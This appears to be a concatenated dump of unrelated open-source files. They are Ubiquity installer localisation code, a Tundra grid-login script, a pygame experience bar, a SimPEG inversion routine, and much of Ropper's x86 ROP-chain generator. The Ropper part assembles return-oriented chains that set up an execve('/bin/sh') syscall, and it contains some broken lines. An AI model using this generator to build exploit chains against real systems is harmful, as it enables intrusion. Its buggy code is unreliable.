use_langs.add(ll_cc)
use_langs.add(ll)
prefixes = 'ubiquity|partman/text/undo_everything|partman/text/unusable|partman-basicfilesystems/bad_mountpoint|partman-basicfilesystems/text/specify_mountpoint|partman-basicmethods/text/format|partman-newworld/no_newworld|partman-partitioning|partman-target/no_root|partman-target/text/method|grub-installer/bootdev|popularity-contest/participate'
prefixes = reduce(lambda x, y: x+'|'+y, extra_prefixes, prefixes)
_translations = {}
devnull = open('/dev/null', 'w')
db = subprocess.Popen(
['debconf-copydb', 'templatedb', 'pipe',
'--config=Name:pipe', '--config=Driver:Pipe',
'--config=InFd:none',
'--pattern=^(%s)' % prefixes],
stdout=subprocess.PIPE, stderr=devnull,
# necessary?
preexec_fn=misc.regain_privileges)
question = None
descriptions = {}
fieldsplitter = re.compile(r':\s*')
for line in db.stdout:
line = line.rstrip('\n')
if ':' not in line:
if question is not None:
_translations[question] = descriptions
descriptions = {}
question = None
continue
(name, value) = fieldsplitter.split(line, 1)
if value == '':
continue
name = name.lower()
if name == 'name':
question = value
elif name.startswith('description'):
namebits = name.split('-', 1)
if len(namebits) == 1:
lang = 'c'
else:
lang = namebits[1].lower()
# TODO: recode from specified encoding
lang = lang.split('.')[0]
if (use_langs is None or lang in use_langs or
question in core_names):
value = strip_context(question, value)
descriptions[lang] = value.replace('\\n', '\n')
elif name.startswith('extended_description'):
namebits = name.split('-', 1)
if len(namebits) == 1:
lang = 'c'
else:
lang = namebits[1].lower()
# TODO: recode from specified encoding
lang = lang.split('.')[0]
if (use_langs is None or lang in use_langs or
question in core_names):
value = strip_context(question, value)
if lang not in descriptions:
descriptions[lang] = value.replace('\\n', '\n')
# TODO cjwatson 2006-09-04: a bit of a hack to get the
# description and extended description separately ...
if question in ('grub-installer/bootdev',
'partman-newworld/no_newworld',
'ubiquity/text/error_updating_installer'):
descriptions["extended:%s" % lang] = \
value.replace('\\n', '\n')
db.wait()
devnull.close()
return _translations
string_questions = {
'new_size_label': 'partman-partitioning/new_size',
'partition_create_heading_label': 'partman-partitioning/text/new',
'partition_create_type_label': 'partman-partitioning/new_partition_type',
'partition_create_mount_label': 'partman-basicfilesystems/text/specify_mountpoint',
'partition_create_use_label': 'partman-target/text/method',
'partition_create_place_label': 'partman-partitioning/new_partition_place',
'partition_edit_use_label': 'partman-target/text/method',
'partition_edit_format_label': 'partman-basicmethods/text/format',
'partition_edit_mount_label': 'partman-basicfilesystems/text/specify_mountpoint',
'grub_device_dialog': 'grub-installer/bootdev',
'grub_device_label': 'grub-installer/bootdev',
# TODO: it would be nice to have a neater way to handle stock buttons
'quit': 'ubiquity/imported/quit',
'back': 'ubiquity/imported/go-back',
'cancelbutton': 'ubiquity/imported/cancel',
'exitbutton': 'ubiquity/imported/quit',
'closebutton1': 'ubiquity/imported/close',
'cancelbutton1': 'ubiquity/imported/cancel',
'okbutton1': 'ubiquity/imported/ok',
}
string_extended = set()
def map_widget_name(prefix, name):
"""Map a widget name to its translatable template."""
if prefix is None:
prefix = 'ubiquity/text'
if '/' in name:
question = name
elif name in string_questions:
question = string_questions[name]
else:
question = '%s/%s' % (prefix, name)
return question
def get_string(name, lang, prefix=None):
"""Get the translation of a single string."""
question = map_widget_name(prefix, name)
translations = get_translations()
if question not in translations:
return None
if lang is None:
lang = 'c'
else:
lang = lang.lower()
if name in string_extended:
lang = 'extended:%s' % lang
if lang in translations[question]:
text = translations[question][lang]
else:
ll_cc = lang.split('.')[0]
ll = ll_cc.split('_')[0]
if ll_cc in translations[question]:
text = translations[question][ll_cc]
elif ll in translations[question]:
text = translations[question][ll]
elif lang.startswith('extended:'):
text = translations[question]['extended:c']
else:
text = translations[question]['c']
return unicode(text, 'utf-8', 'replace')
# Based on code by Walter Dörwald:
# http://mail.python.org/pipermail/python-list/2007-January/424460.html
def ascii_transliterate(exc):
if not isinstance(exc, UnicodeEncodeError):
raise TypeError("don't know how to handle %r" % exc)
import unicodedata
s = unicodedata.normalize('NFD', exc.object[exc.start])[:1]
if ord(s) in range(128):
return s, exc.start + 1
else:
return u'', exc.start + 1
codecs.register_error('ascii_transliterate', ascii_transliterate)
# Returns a tuple of (current language, sorted choices, display map).
def get_languages(current_language_index=-1, only_installable=False):
import gzip
import PyICU
current_language = "English"
if only_installable:
from apt.cache import Cache
#workaround for an issue where euid != uid and the
#apt cache has not yet been loaded causing a SystemError
#when libapt-pkg tries to load the Cache the first time.
with misc.raised_privileges():
cache = Cache()
languagelist = gzip.open('/usr/lib/ubiquity/localechooser/languagelist.data.gz')
language_display_map = {}
i = 0
for line in languagelist:
line = unicode(line, 'utf-8')
if line == '' or line == '\n':
continue
code, name, trans = line.strip(u'\n').split(u':')[1:]
if code in ('C', 'dz', 'km'):
i += 1
continue
if only_installable:
pkg_name = 'language-pack-%s' % code
#special case these
if pkg_name.endswith('_CN'):
pkg_name = 'language-pack-zh-hans'
elif pkg_name.endswith('_TW'):
pkg_name = 'language-pack-zh-hant'
elif pkg_name.endswith('_NO'):
pkg_name = pkg_name.split('_NO')[0]
elif pkg_name.endswith('_BR'):
pkg_name = pkg_name.split('_BR')[0]
try:
pkg = cache[pkg_name]
if not (pkg.installed or pkg.candidate):
i += 1
continue
except KeyError:
i += 1
continue
language_display_map[trans] = (name, code)
if i == current_language_index:
current_language = trans
i += 1
languagelist.close()
if only_installable:
del cache
try:
# Note that we always collate with the 'C' locale. This is far
# from ideal. But proper collation always requires a specific
# language for its collation rules (languages frequently have
# custom sorting). This at least gives us common sorting rules,
# like stripping accents.
collator = PyICU.Collator.createInstance(PyICU.Locale('C'))
except:
collator = None
def compare_choice(x):
if language_display_map[x][1] == 'C':
return None # place C first
if collator:
try:
return collator.getCollationKey(x).getByteArray()
except:
pass
# Else sort by unicode code point, which isn't ideal either,
# but also has the virtue of sorting like-glyphs together
return x
sorted_choices = sorted(language_display_map, key=compare_choice)
return current_language, sorted_choices, language_display_map
def default_locales():
languagelist = open('/usr/lib/ubiquity/localechooser/languagelist')
defaults = {}
for line in languagelist:
line = unicode(line, 'utf-8')
if line == '' or line == '\n':
continue
bits = line.strip(u'\n').split(u';')
code = bits[0]
locale = bits[4]
defaults[code] = locale
languagelist.close()
return defaults
# vim:ai:et:sts=4:tw=80:sw=4:
|
gpl-3.0
| -2,029,924,248,393,744,000
| 36.698507
| 356
| 0.588645
| false
| 4.005392
| false
| false
| false
|
antont/tundra
|
src/Application/PythonScriptModule/pymodules_old/simiangrid/auth.py
|
1
|
2238
|
#httplib was ok and httplib2 especially had nice api, but they don't work thru proxies and stuff
#-- curl is the most robust thing
#import httplib
import curl #a high level wrapper over pycurl bindings
import json
import hashlib #only 'cause has a hardcoded pwd here now - for real this comes from connection or launcher
try:
import naali
except ImportError:
naali = None #so that can test standalone too, without Naali
else:
import circuits
class SimiangridAuthentication(circuits.BaseComponent):
pass #put disconnecting to on_exit here to not leave old versions while reloading
url = "http://localhost/Grid/"
c = curl.Curl()
def simiangrid_auth(url, username, md5hex):
params = {'RequestMethod': 'AuthorizeIdentity',
'Identifier': username,
'Type': 'md5hash',
'Credential': md5hex}
rdata = c.post(url, params)
print rdata
r = json.loads(rdata)
#http://code.google.com/p/openmetaverse/wiki/AuthorizeIdentity
success = r.get('Success', False)
#NOTE: docs say reply should have Success:false upon failure.
#however in my test run it doesn't just the Message of missing/invalid creds
#this code works for that too.
return success
def on_connect(conn_id, userconn):
print userconn.GetLoginData()
username = userconn.GetProperty("username")
username = username.replace('_', ' ') #XXX HACK: tundra login doesn't allow spaces, whereas simiangrid frontend demands them
pwd = userconn.GetProperty("password")
md5hex = hashlib.md5(pwd).hexdigest()
success = simiangrid_auth(url, username, md5hex)
print "Authentication success:", success, "for", conn_id, userconn
if not success:
userconn.DenyConnection()
if naali is not None:
s = naali.server
if s.IsAboutToStart():
s.connect("UserAboutToConnect(int, UserConnection*)", on_connect)
print "simiangrid/auth.py running on server - hooked to authorize connections"
else:
on_connect(17, {'username': "Lady Tron",
'password': "They only want you when you're seventeen"})
"""
{ "Success":true, "UserID":"fe5f5ac3-7b28-4276-ae50-133db72040f0" }
Authentication success: True
"""
|
apache-2.0
| -1,794,691,461,481,782,000
| 33.430769
| 128
| 0.689455
| false
| 3.723794
| false
| false
| false
|
MarkusHackspacher/PythonFarmGame
|
farmlib/expbar.py
|
1
|
2110
|
'''
Created on 31-05-2012
@author: orneo1212
'''
import pygame
from pygameui import Label
class ExpBar(Label):
"""ExpBar class
"""
def __init__(self, player):
self.player = player
self.oldexp = -1.0
Label.__init__(self, "", (9, 58))
def update_text(self):
"""update text
:return:
"""
# get data
exp = self.player.exp
nextlvlexp = self.player.nextlvlexp
level = self.player.level
self.oldexp = self.player.exp
# calculate progress and set text
progress = int(exp / nextlvlexp * 100)
self.settext("Level: " + str(level) + " Exp: {0!s}/{1!s} ({2!s} %)".
format(int(exp), int(nextlvlexp), progress))
def update(self):
"""update
:return:
"""
if self.oldexp != self.player.exp:
self.repaint()
def repaint(self):
"""repaint
:return:
"""
self.update_text()
self.size = self.width, self.height = ((48 + 2) * 6 - 1, 16)
self.create_widget_image()
# draw background
pygame.draw.rect(self.img, (0, 32, 0),
(1, 1, self.width - 1, self.height - 1))
# draw background (progress)
progresswidth = self.width / self.player.nextlvlexp * self.player.exp
pygame.draw.rect(self.img, (0, 100, 0),
(1, 1, int(progresswidth) - 1, self.height - 1))
# draw border
pygame.draw.rect(self.img, (0, 255, 0),
(1, 1, self.width - 1, self.height - 1), 1)
# draw text
text = self.gettext()
txtimg = self.labelfont.render(text, 0, (64, 255, 100), (255, 0, 255))
txtimg.set_colorkey((255, 0, 255))
# Draw centered
px = self.width / 2 - txtimg.get_size()[0] / 2
py = self.height / 2 - txtimg.get_size()[1] / 2
self.img.blit(txtimg, (px, py))
def redraw(self, surface):
"""redraw
:param surface:
:return:
"""
surface.blit(self.img, self.position)
|
gpl-3.0
| 8,185,247,811,750,345,000
| 26.402597
| 78
| 0.507109
| false
| 3.425325
| false
| false
| false
|
simpeg/simpeg
|
SimPEG/EM/Static/IP/Run.py
|
1
|
2114
|
import numpy as np
from SimPEG import (Maps, DataMisfit, Regularization,
Optimization, Inversion, InvProblem, Directives)
def run_inversion(
m0, survey, actind, mesh,
std, eps,
maxIter=15, beta0_ratio=1e0,
coolingFactor=5, coolingRate=2,
upper=np.inf, lower=-np.inf,
use_sensitivity_weight=False,
alpha_s=1e-4,
alpha_x=1.,
alpha_y=1.,
alpha_z=1.,
):
"""
Run IP inversion
"""
dmisfit = DataMisfit.l2_DataMisfit(survey)
uncert = abs(survey.dobs) * std + eps
dmisfit.W = 1./uncert
# Map for a regularization
regmap = Maps.IdentityMap(nP=int(actind.sum()))
# Related to inversion
if use_sensitivity_weight:
reg = Regularization.Sparse(
mesh, indActive=actind, mapping=regmap
)
reg.alpha_s = alpha_s
reg.alpha_x = alpha_x
reg.alpha_y = alpha_y
reg.alpha_z = alpha_z
else:
reg = Regularization.Sparse(
mesh, indActive=actind, mapping=regmap,
cell_weights=mesh.vol[actind]
)
reg.alpha_s = alpha_s
reg.alpha_x = alpha_x
reg.alpha_y = alpha_y
reg.alpha_z = alpha_z
opt = Optimization.ProjectedGNCG(maxIter=maxIter, upper=upper, lower=lower)
invProb = InvProblem.BaseInvProblem(dmisfit, reg, opt)
beta = Directives.BetaSchedule(
coolingFactor=coolingFactor, coolingRate=coolingRate
)
betaest = Directives.BetaEstimate_ByEig(beta0_ratio=beta0_ratio)
target = Directives.TargetMisfit()
# Need to have basice saving function
if use_sensitivity_weight:
updateSensW = Directives.UpdateSensitivityWeights()
update_Jacobi = Directives.UpdatePreconditioner()
directiveList = [
beta, betaest, target, update_Jacobi
]
else:
directiveList = [
beta, betaest, target
]
inv = Inversion.BaseInversion(
invProb, directiveList=directiveList
)
opt.LSshorten = 0.5
opt.remember('xc')
# Run inversion
mopt = inv.run(m0)
return mopt, invProb.dpred
|
mit
| 3,890,722,355,732,215,300
| 28.361111
| 79
| 0.621097
| false
| 3.36089
| false
| false
| false
|
howknows/Ropper
|
ropperapp/disasm/chain/arch/ropchainx86.py
|
1
|
36189
|
# coding=utf-8
#
# Copyright 2014 Sascha Schirra
#
# This file is part of Ropper.
#
# Ropper is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ropper is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from ropperapp.disasm.gadget import Category
from ropperapp.common.error import *
from ropperapp.common.utils import *
from ropperapp.disasm.rop import Ropper
from ropperapp.disasm.arch import x86
from ropperapp.disasm.chain.ropchain import *
from ropperapp.loaders.loader import Type
from re import match
import itertools
import math
class RopChainX86(RopChain):
MAX_QUALI = 7
def _printHeader(self):
toReturn = ''
toReturn += ('#!/usr/bin/env python\n')
toReturn += ('# Generated by ropper ropchain generator #\n')
toReturn += ('from struct import pack\n')
toReturn += ('\n')
toReturn += ('p = lambda x : pack(\'I\', x)\n')
toReturn += ('\n')
return toReturn
def _printRebase(self):
toReturn = ''
for binary,section in self._usedBinaries:
imageBase = binary.manualImagebase + section.offset if binary.manualImagebase != None else section.virtualAddress
toReturn += ('IMAGE_BASE_%d = %s # %s\n' % (self._usedBinaries.index((binary, section)),toHex(imageBase , 4), binary.fileName))
toReturn += ('rebase_%d = lambda x : p(x + IMAGE_BASE_%d)\n\n'% (self._usedBinaries.index((binary, section)),self._usedBinaries.index((binary, section))))
return toReturn
@classmethod
def name(cls):
return ''
@classmethod
def availableGenerators(cls):
return [RopChainX86System, RopChainX86Mprotect, RopChainX86VirtualProtect]
@classmethod
def archs(self):
return [x86]
def _createDependenceChain(self, gadgets):
"""
gadgets - list with tuples
tuple contains:
- method to create chaingadget
- list with arguments
- dict with named arguments
- list with registers which are not allowed to override in the gadget
"""
failed = []
cur_len = 0
cur_chain = ''
counter = 0
max_perm = math.factorial(len(gadgets))
for x in itertools.permutations(gadgets):
counter += 1
self._printer.puts('\r[*] Try permuation %d / %d' % (counter, max_perm))
found = False
for y in failed:
if x[:len(y)] == y:
found = True
break
if found:
continue
try:
fail = []
chain2 = ''
dontModify = []
badRegs = []
c = 0
for idx in range(len(x)):
g = x[idx]
if idx != 0:
badRegs.extend(x[idx-1][3])
dontModify.extend(g[3])
fail.append(g)
chain2 += g[0](*g[1], badRegs=badRegs, dontModify=dontModify,**g[2])[0]
cur_chain += chain2
break
except RopChainError as e:
pass
if len(fail) > cur_len:
cur_len = len(fail)
cur_chain = '# Filled registers: '
for fa in fail[:-1]:
cur_chain += (fa[2]['reg']) + ', '
cur_chain += '\n'
cur_chain += chain2
failed.append(tuple(fail))
else:
self._printer.println('')
self._printer.printInfo('Cannot create chain which fills all registers')
# print('Impossible to create complete chain')
self._printer.println('')
return cur_chain
def _isModifiedOrDereferencedAccess(self, gadget, dontModify):
regs = []
for line in gadget.lines[1:]:
line = line[1]
if '[' in line:
return True
if dontModify:
m = match('[a-z]+ (e?[abcds][ixlh]),?.*', line)
if m and m.group(1) in dontModify:
return True
return False
def _paddingNeededFor(self, gadget):
regs = []
for idx in range(1,len(gadget.lines)):
line = gadget.lines[idx][1]
matched = match('^pop (...)$', line)
if matched:
regs.append(matched.group(1))
return regs
def _printRopInstruction(self, gadget, padding=True):
toReturn = ('rop += rebase_%d(%s) # %s\n' % (self._usedBinaries.index((gadget._binary, gadget._section)),toHex(gadget.lines[0][0],4), gadget.simpleInstructionString()))
if padding:
regs = self._paddingNeededFor(gadget)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
return toReturn
def _printAddString(self, string):
return ('rop += \'%s\'\n' % string)
def _printRebasedAddress(self, addr, comment='', idx=0):
return ('rop += rebase_%d(%s)\n' % (idx,addr))
def _printPaddingInstruction(self, addr='0xdeadbeef'):
return ('rop += p(%s)\n' % addr)
def _containsZeroByte(self, addr):
return addr & 0xff == 0 or addr & 0xff00 == 0 or addr & 0xff0000 == 0 or addr & 0xff000000 == 0
def _createZeroByteFillerForSub(self, number):
start = 0x01010101
for i in xrange(start, 0x02020202):
if not self._containsZeroByte(i) and not self._containsZeroByte(i+number):
return i
def _createZeroByteFillerForAdd(self, number):
start = 0x01010101
for i in xrange(start, 0x02020202):
if not self._containsZeroByte(i) and not self._containsZeroByte(number-i):
return i
def _find(self, category, reg=None, srcdst='dst', badDst=[], badSrc=None, dontModify=None, srcEqDst=False, switchRegs=False ):
quali = 1
while quali < RopChainX86System.MAX_QUALI:
for binary in self._binaries:
for section, gadgets in binary.gadgets.items():
for gadget in gadgets:
if gadget.category[0] == category and gadget.category[1] == quali:
if badSrc and gadget.category[2]['src'] in badSrc:
continue
if badDst and gadget.category[2]['dst'] in badDst:
continue
if not gadget.lines[len(gadget.lines)-1][1].strip().endswith('ret') or 'esp' in gadget.simpleString():
continue
if srcEqDst and (not (gadget.category[2]['dst'] == gadget.category[2]['src'])):
continue
elif not srcEqDst and 'src' in gadget.category[2] and (gadget.category[2]['dst'] == gadget.category[2]['src']):
continue
if self._isModifiedOrDereferencedAccess(gadget, dontModify):
continue
if reg:
if gadget.category[2][srcdst] == reg:
if (gadget._binary, gadget._section) not in self._usedBinaries:
self._usedBinaries.append((gadget._binary, gadget._section))
return gadget
elif switchRegs:
other = 'src' if srcdst == 'dst' else 'dst'
if gadget.category[2][other] == reg:
if (gadget._binary, gadget._section) not in self._usedBinaries:
self._usedBinaries.append((gadget._binary, gadget._section))
return gadget
else:
if (gadget._binary, gadget._section) not in self._usedBinaries:
self._usedBinaries.append((gadget._binary, gadget._section))
return gadget
quali += 1
def _createWriteStringWhere(self, what, where, reg=None, dontModify=[], idx=0):
badRegs = []
badDst = []
while True:
popReg = self._find(Category.LOAD_REG, reg=reg, badDst=badRegs, dontModify=dontModify)
if not popReg:
raise RopChainError('Cannot build writewhatwhere gadget!')
write4 = self._find(Category.WRITE_MEM, reg=popReg.category[2]['dst'], badDst=
badDst, srcdst='src')
if not write4:
badRegs.append(popReg.category[2]['dst'])
continue
else:
popReg2 = self._find(Category.LOAD_REG, reg=write4.category[2]['dst'], dontModify=[popReg.category[2]['dst']]+dontModify)
if not popReg2:
badDst.append(write4.category[2]['dst'])
continue
else:
break;
if len(what) % 4 > 0:
what += ' ' * (4 - len(what) % 4)
toReturn = ''
for index in range(0,len(what),4):
part = what[index:index+4]
toReturn += self._printRopInstruction(popReg,False)
toReturn += self._printAddString(part)
regs = self._paddingNeededFor(popReg)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
toReturn += self._printRopInstruction(popReg2, False)
toReturn += self._printRebasedAddress(toHex(where+index,4), idx=idx)
regs = self._paddingNeededFor(popReg2)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
toReturn += self._printRopInstruction(write4)
return (toReturn,popReg.category[2]['dst'], popReg2.category[2]['dst'])
def _createWriteRegValueWhere(self, what, where, dontModify=[], idx=0):
badRegs = []
badDst = []
while True:
write4 = self._find(Category.WRITE_MEM, reg=what, badDst=badDst, dontModify=dontModify, srcdst='src')
if not write4:
raise RopChainError('Cannot build writewhatwhere gadget!')
else:
popReg2 = self._find(Category.LOAD_REG, reg=write4.category[2]['dst'], dontModify=[what]+dontModify)
if not popReg2:
badDst.append(write4.category[2]['dst'])
continue
else:
break;
toReturn = self._printRopInstruction(popReg2, False)
toReturn += self._printRebasedAddress(toHex(where,4), idx=idx)
regs = self._paddingNeededFor(popReg2)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
toReturn += self._printRopInstruction(write4)
return (toReturn,what, popReg2.category[2]['dst'])
def _createLoadRegValueFrom(self, what, from_reg, dontModify=[], idx=0):
try:
return self._createLoadRegValueFromMov(what, from_reg, dontModify, idx)
except:
return self._createLoadRegValueFromXchg(what, from_reg, dontModify, idx)
def _createLoadRegValueFromMov(self, what, from_reg, dontModify=[], idx=0):
badRegs = []
badDst = []
while True:
load4 = self._find(Category.LOAD_MEM, reg=what, badDst=badDst, dontModify=dontModify, srcdst='dst')
if not load4:
raise RopChainError('Cannot build loadwhere gadget!')
else:
popReg2 = self._find(Category.LOAD_REG, reg=load4.category[2]['src'], dontModify=[what,load4.category[2]['src']]+dontModify)
if not popReg2:
badDst.append(load4.category[2]['src'])
continue
else:
break;
toReturn = self._printRopInstruction(popReg2, False)
toReturn += self._printRebasedAddress(toHex(from_re,4), idx=idx)
regs = self._paddingNeededFor(popReg2)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
toReturn += self._printRopInstruction(load4)
return (toReturn,what, popReg2.category[2]['dst'])
def _createLoadRegValueFromXchg(self, what, from_reg, dontModify=[], idx=0):
badRegs = []
badDst = []
while True:
load4 = self._find(Category.XCHG_REG, reg=what, badDst=badDst, dontModify=dontModify, srcdst='src')
if not load4:
raise RopChainError('Cannot build loadwhere gadget!')
else:
mov = self._find(Category.LOAD_MEM, reg=load4.category[2]['dst'], badDst=badDst, dontModify=[load4.category[2]['dst']]+dontModify, srcdst='dst')
if not mov:
badDst.append(load4.category[2]['dst'])
continue
popReg2 = self._find(Category.LOAD_REG, reg=mov.category[2]['src'], dontModify=[what,load4.category[2]['src']]+dontModify)
if not popReg2:
badDst.append(load4.category[2]['src'])
continue
else:
break;
toReturn = self._printRopInstruction(popReg2, False)
toReturn += self._printRebasedAddress(toHex(from_reg,4), idx=idx)
regs = self._paddingNeededFor(popReg2)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
toReturn += self._printRopInstruction(mov)
toReturn += self._printRopInstruction(load4)
return (toReturn,what, popReg2.category[2]['dst'])
def _createNumberSubtract(self, number, reg=None, badRegs=None, dontModify=None):
if not badRegs:
badRegs=[]
while True:
sub = self._find(Category.SUB_REG, reg=reg, badDst=badRegs, badSrc=badRegs, dontModify=dontModify)
if not sub:
raise RopChainError('Cannot build number with subtract gadget for reg %s!' % reg)
popSrc = self._find(Category.LOAD_REG, reg=sub.category[2]['src'], dontModify=dontModify)
if not popSrc:
badRegs.append=[sub.category[2]['src']]
continue
popDst = self._find(Category.LOAD_REG, reg=sub.category[2]['dst'], dontModify=[sub.category[2]['src']]+dontModify)
if not popDst:
badRegs.append=[sub.category[2]['dst']]
continue
else:
break;
filler = self._createZeroByteFillerForSub(number)
toReturn = self._printRopInstruction(popSrc, False)
toReturn += self._printPaddingInstruction(toHex(filler,4))
regs = self._paddingNeededFor(popSrc)
for i in range(len(regs)):
toReturn += self._printPaddingInstruction()
toReturn += self._printRopInstruction(popDst, False)
toReturn += self._printPaddingInstruction(toHex(filler+number,4))
regs = self._paddingNeededFor(popDst)
for i in range(len(regs)):
toReturn += self._printPaddingInstruction()
toReturn += self._printRopInstruction(sub)
return (toReturn, popDst.category[2]['dst'],popSrc.category[2]['dst'])
def _createNumberAddition(self, number, reg=None, badRegs=None, dontModify=None):
if not badRegs:
badRegs=[]
while True:
sub = self._find(Category.ADD_REG, reg=reg, badDst=badRegs, badSrc=badRegs, dontModify=dontModify)
if not sub:
raise RopChainError('Cannot build number with addition gadget for reg %s!' % reg)
popSrc = self._find(Category.LOAD_REG, reg=sub.category[2]['src'], dontModify=dontModify)
if not popSrc:
badRegs.append=[sub.category[2]['src']]
continue
popDst = self._find(Category.LOAD_REG, reg=sub.category[2]['dst'], dontModify=[sub.category[2]['src']]+dontModify)
if not popDst:
badRegs.append(sub.category[2]['dst'])
continue
else:
break;
filler = self._createZeroByteFillerForAdd(number)
toReturn = self._printRopInstruction(popSrc, False)
toReturn += self._printPaddingInstruction(toHex(filler,4))
regs = self._paddingNeededFor(popSrc)
for i in range(len(regs)):
toReturn += self._printPaddingInstruction()
toReturn += self._printRopInstruction(popDst, False)
toReturn += self._printPaddingInstruction(toHex(number - filler,4))
regs = self._paddingNeededFor(popDst)
for i in range(len(regs)):
toReturn += self._printPaddingInstruction()
toReturn += self._printRopInstruction(sub)
return (toReturn, popDst.category[2]['dst'],popSrc.category[2]['dst'])
def _createNumberPop(self, number, reg=None, badRegs=None, dontModify=None):
while True:
popReg = self._find(Category.LOAD_REG, reg=reg, badDst=badRegs,dontModify=dontModify)
if not popReg:
raise RopChainError('Cannot build number with xor gadget!')
incReg = self._find(Category.INC_REG, reg=popReg.category[2]['dst'], dontModify=dontModify)
if not incReg:
if not badRegs:
badRegs = []
badRegs.append(popReg.category[2]['dst'])
else:
break
toReturn = self._printRopInstruction(popReg)
toReturn += self._printPaddingInstruction(toHex(0xffffffff,4))
for i in range(number+1):
toReturn += self._printRopInstruction(incReg)
return (toReturn ,popReg.category[2]['dst'],)
def _createNumberXOR(self, number, reg=None, badRegs=None, dontModify=None):
while True:
clearReg = self._find(Category.CLEAR_REG, reg=reg, badDst=badRegs, badSrc=badRegs,dontModify=dontModify, srcEqDst=True)
if not clearReg:
raise RopChainError('Cannot build number with xor gadget!')
if number > 0:
incReg = self._find(Category.INC_REG, reg=clearReg.category[2]['src'], dontModify=dontModify)
if not incReg:
if not badRegs:
badRegs = []
badRegs.append(clearReg.category[2]['src'])
else:
break
else:
break
toReturn = self._printRopInstruction(clearReg)
for i in range(number):
toReturn += self._printRopInstruction(incReg)
return (toReturn, clearReg.category[2]['dst'],)
def _createNumberXchg(self, number, reg=None, badRegs=None, dontModify=None):
xchg = self._find(Category.XCHG_REG, reg=reg, badDst=badRegs, dontModify=dontModify)
if not xchg:
raise RopChainError('Cannot build number gadget with xchg!')
other = xchg.category[2]['src'] if xchg.category[2]['dst'] else xchg.category[2]['dst']
toReturn = self._createNumber(number, other, badRegs, dontModify)[0]
toReturn += self._printRopInstruction(xchg)
return (toReturn, reg, other)
def _createNumberNeg(self, number, reg=None, badRegs=None, dontModify=None):
if number == 0:
raise RopChainError('Cannot build number gadget with neg if number is 0!')
neg = self._find(Category.NEG_REG, reg=reg, badDst=badRegs, dontModify=dontModify)
if not neg:
raise RopChainError('Cannot build number gadget with neg!')
pop = self._find(Category.LOAD_REG, reg=reg, badDst=badRegs, dontModify=dontModify)
if not pop:
raise RopChainError('Cannot build number gadget with neg!')
toReturn = self._printRopInstruction(pop)
toReturn += self._printPaddingInstruction(toHex((~number)+1)) # two's complement
toReturn += self._printRopInstruction(neg)
return (toReturn, reg,)
def _createNumber(self, number, reg=None, badRegs=None, dontModify=None, xchg=True):
try:
if self._containsZeroByte(number):
try:
return self._createNumberNeg(number, reg, badRegs,dontModify)
except RopChainError as e:
if number < 50:
try:
return self._createNumberXOR(number, reg, badRegs,dontModify)
except RopChainError:
try:
return self._createNumberPop(number, reg, badRegs,dontModify)
except RopChainError:
try:
return self._createNumberSubtract(number, reg, badRegs,dontModify)
except RopChainError:
return self._createNumberAddition(number, reg, badRegs,dontModify)
else :
try:
return self._createNumberSubtract(number, reg, badRegs,dontModify)
except RopChainError:
return self._createNumberAddition(number, reg, badRegs,dontModify)
else:
popReg =self._find(Category.LOAD_REG, reg=reg, badDst=badRegs,dontModify=dontModify)
if not popReg:
raise RopChainError('Cannot build number gadget!')
toReturn = self._printRopInstruction(popReg)
toReturn += self._printPaddingInstruction(toHex(number,4))
return (toReturn , popReg.category[2]['dst'])
except:
return self._createNumberXchg(number, reg, badRegs, dontModify)
def _createAddress(self, address, reg=None, badRegs=None, dontModify=None):
popReg = self._find(Category.LOAD_REG, reg=reg, badDst=badRegs,dontModify=dontModify)
if not popReg:
raise RopChainError('Cannot build address gadget!')
toReturn = ''
toReturn += self._printRopInstruction(popReg,False)
toReturn += self._printRebasedAddress(toHex(address, 4), idx=self._usedBinaries.index((popReg._binary, popReg._section)))
regs = self._paddingNeededFor(popReg)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
return (toReturn,popReg.category[2]['dst'])
def _createSyscall(self, reg=None, badRegs=None, dontModify=None):
syscall = self._find(Category.SYSCALL, reg=None, badDst=None, dontModify=dontModify)
if not syscall:
raise RopChainError('Cannot build syscall gadget!')
toReturn = ''
toReturn += self._printRopInstruction(syscall)
return (toReturn,)
def _createOpcode(self, opcode):
return self._printRopInstruction(self._searchOpcode(opcode))
def _searchOpcode(self, opcode):
r = Ropper(self._binaries[0])
gadgets = []
for section in self._binaries[0].executableSections:
vaddr = section.virtualAddress
gadgets.extend(
r.searchOpcode(section.bytes, opcode.decode('hex'), section.offset, True, section=section))
if len(gadgets) > 0:
return gadgets[0]
else:
raise RopChainError('Cannot create gadget for opcode: %x' % opcode)
def create(self):
pass
class RopChainX86System(RopChainX86):
@classmethod
def name(cls):
return 'execve'
def _createCommand(self, what, where, reg=None, dontModify=[], idx=0):
if len(what) % 4 > 0:
what = '/' * (4 - len(what) % 4) + what
return self._createWriteStringWhere(what,where, idx=idx)
def create(self, cmd='/bin/sh'):
if len(cmd.split(' ')) > 1:
raise RopChainError('No argument support for execve commands')
self._printer.printInfo('ROPchain Generator for syscall execve:\n')
self._printer.println('\nwrite command into data section\neax 0xb\nebx address to cmd\necx address to null\nedx address to null\n')
section = self._binaries[0].getSection(b'.data')
length = math.ceil(float(len(cmd))/4) * 4
chain = self._printHeader()
chain_tmp = '\n'
chain_tmp += self._createCommand(cmd,section.struct.sh_offset+0x1000)[0]
badregs = []
while True:
ret = self._createNumber(0x0, badRegs=badregs)
chain_tmp += ret[0]
try:
chain_tmp += self._createWriteRegValueWhere(ret[1], section.struct.sh_offset+0x1000+length)[0]
break
except BaseException as e:
raise e
badregs.append(ret[1])
gadgets = []
gadgets.append((self._createAddress, [section.struct.sh_offset+0x1000],{'reg':'ebx'},['ebx', 'bx', 'bl', 'bh']))
gadgets.append((self._createAddress, [section.struct.sh_offset+0x1000+length],{'reg':'ecx'},['ecx', 'cx', 'cl', 'ch']))
